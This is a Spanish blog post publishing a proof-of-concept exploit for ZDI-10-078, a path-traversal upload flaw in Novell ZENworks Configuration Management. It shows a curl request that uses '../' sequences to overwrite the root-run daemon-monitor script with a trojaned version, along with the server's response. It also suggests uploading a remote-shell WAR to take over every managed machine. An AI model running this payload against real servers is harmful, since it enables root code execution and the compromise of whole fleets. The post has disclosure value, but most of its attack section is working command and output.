27 abril 2010

PdC de ZDI-10-078

Posted by tucanalamigo at 03:00

# Exploit Title: ZDI-10-078: Novell ZENworks Configuration Management UploadServlet Remote Code Execution Vulnerability
# Date: 2009-04-26
# Author: tucanalamigo http://tucanalamigo.blogspot.com
# Software Link: http://www.novell.com/products/zenworks/configurationmanagement/
# Version: 10.2
# Tested on: GNU/Linux (SLES11)


* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
PoC for vulnerability discovered by Stephen Fewer (www.harmonysecurity.com)
http://www.zerodayinitiative.com/advisories/ZDI-10-078/
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

You can overwrite any file owned by zenworks user (nearly all /opt/novell) such as /opt/novell/zenworks/bin/daemon-monitor that is a shell script executed by Novell ZENworks Daemon Monitor (/etc/init.d/novell-zenmntr) and "of course" running as root...


$ ls -l /opt/novell/zenworks/bin/daemon-monitor
-rw-rw-r-- 1 zenworks zenworks 554 XXXX-YY-ZZ 69:69 /opt/novell/zenworks/bin/daemon-monitor
$ cat /opt/novell/zenworks/bin/daemon-monitor
SERVICES=`awk -F= '{ if ($1 == # "services") print $2}' /etc/opt/novell/zenworks/monitor.conf`
SLEEPTIME=`awk -F= '{ if ($1 == "sleep") print $2}' /etc/opt/novell/zenworks/monitor.conf`

echo $SERVICES
echo $SLEEPTIME

if [ -z "$SERVICES" ]; then
echo "No services defined in /etc/opt/novell/zenworks/monitor.conf"
exit 1
fi

if [ -z "$SLEEPTIME" ]; then
SLEEPTIME=10
fi

while [ 1 ]; do
sleep $SLEEPTIME
for SRV in $SERVICES; do
/etc/init.d/$SRV status >/dev/null 2>&1 || /etc/init.d/$SRV start
( date ; id ) >> /tmp/monitor.log 2>&1
done
done
$


You can change /opt/novell/zenworks/bin/jsvc (Java Virtual Machine), upload a new remoteshell.war on /opt/novell/zenworks/share/tomcat/webapps or use
imagination to take control of all machines configured in ZCM.

PoC: Upload your own daemon-monitor (./daemon-monitor.troyanizado):


$ curl -ivkl 'http://zcm.server/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true' --data-binary @./daemon-monitor.troyanizado -H "Content-Type: application/octet-stream"
* About to connect() to zcm.server port 80 (#0)
* Trying 127.11.22.33... connected
* Connected to zcm.server (127.11.22.33) port 80 (#0)
> POST /zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true HTTP/1.1
> User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.12.6.2 zlib/1.2.3 libidn/1.9 libssh2/1.2.2
> Host: zcm.server
> Accept: */*
> Content-Type: application/octet-stream
> Content-Length: 554
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
Server: Apache-Coyote/1.1
< Content-Length: 0
Content-Length: 0
< Date: Mon, 26 Apr 2010 21:58:05 GMT
Date: Mon, 26 Apr 2010 21:58:05 GMT


* Connection #0 to host zcm.server left intact
* Closing connection #0
$



--
Saludos de #linux, tu canal amigo.
Labels:

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)